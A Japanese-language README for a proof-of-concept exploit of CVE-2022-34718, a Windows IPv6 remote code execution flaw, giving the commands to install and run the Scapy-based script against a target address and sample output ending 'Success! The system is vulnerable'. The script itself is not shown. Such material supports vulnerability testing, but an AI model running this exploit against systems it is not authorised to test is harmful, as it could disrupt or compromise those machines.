
このリポジトリには、Windows システム上の IPv6 におけるリモートコード実行 (RCE) 脆弱性である CVE-2022-34718 のエクスプロイトが含まれています。
この脆弱性は特別に細工された IPv6 パケットを必要とするため、Scapy モジュールに依存しており、root で実行する必要があります。この PoC を実行する推奨方法は、以下のように仮想環境を介する方法です。
# virtualenv PoC
# source PoC/bin/activate
(PoC) # pip3 install -r requirements.txt
(PoC) # python3 ipv6-rce-poc.py <target address>
このスクリプトは、対象システムがこのエクスプロイトに対して脆弱かどうかを教えてくれます。
[...]
**** inner_frag_id: 0x24944eac
Preparing frags...
Sending 64 frags...
.
Sent 1 packets.
[...]
Sent 1 packets.
Now sending the last inner fragment to trigger the bug...
.
Sent 1 packets.
Success! The system is vulnerable...